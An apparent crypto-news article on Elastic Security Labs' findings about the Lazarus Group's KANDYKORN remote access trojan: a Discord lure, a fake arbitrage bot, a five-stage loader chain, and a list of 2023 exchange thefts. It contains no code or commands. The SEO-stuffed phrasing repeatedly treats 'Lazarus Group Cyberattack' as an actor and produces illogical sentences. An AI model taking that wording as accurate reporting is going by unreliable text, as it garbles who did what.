Lazarus Group Cyberattack Executes New Kandykorn Malware

Lazarus Group Cyberattack
Share

A recent cyber onslaught on a digital currency trading platform has been attributed to the infamous Lazarus Group Cyberattack, deploying a novel and pernicious malware labeled Kandykorn.

[ez-toc]

Unveiled by Elastic Security Labs on October 31st, the Lazarus Group Cyberattack involved the employment of the Kandykorn malware, marking a new chapter in the group’s nefarious operations. The cyberattack, which traces its roots back to April 2023, exhibited striking resemblances to previous Lazarus Group Cyberattack strategies, including their tactical network infrastructure and operational methods.

The perpetrators, masquerading as blockchain experts, lured fellow engineers from the unnamed exchange on a public Discord server. The engineers were enticed by a so-called lucrative arbitrage bot, promised to capitalize on price disparities across different exchanges. This bot, however, was a facade for the Kandykorn malware, cloaked under files like “config.py” and “pricetable.py.”

A Five-Stage Deployment by the Lazarus Group Cyberattack

The intricate Lazarus Group Cyberattack’s implementation of the ‘KANDYKORN’ malware unfolds through an elaborate five-stage sequence, culminating in a powerful tool designed for surveillance and discreet operations. The attack begins with watcher.py, a Python script within “Main.py,” triggering a remote download from Google Drive to “testSpeed.py,” which then self-destructs to cover its tracks.

The Lazarus Group Cyberattack’s use of “FinderTools” fetches the “SUGARLOADER,” which conceals itself via a binary packer, a challenge for standard malware detection solutions. SUGARLOADER connects to a remote server, downloading the ultimate payload—KANDYKORN—which operates directly in memory, all while mimicking a legitimate Discord app through a binary named HLOADER.

As a Remote Access Trojan, the KANDYKORN malware from the Lazarus Group Cyberattack is equipped with extensive functionalities, including file manipulation, data theft, and command execution, establishing a gateway for an extensive range of malevolent activities.

2023’s Spate of Crypto Hacks Tied to Lazarus Group Cyberattack

The year 2023 has seen a spate of crypto exchange infiltrations, with private-key breaches often traced back to the Lazarus Group Cyberattack. Noteworthy is the Stake.com hack, where the Lazarus Group Cyberattack led to a staggering $40 million loss. The Lazarus Group’s cyberattack patterns have been associated with almost $240 million in stolen cryptocurrencies since June, impacting various entities such as Atomic Wallet and CoinEx.

Despite these breaches, the United States Federal Bureau of Investigation has pinpointed the Lazarus Group Cyberattack as the principal agent behind these incidents, emphasizing the critical need for fortified security protocols within the crypto exchange sphere.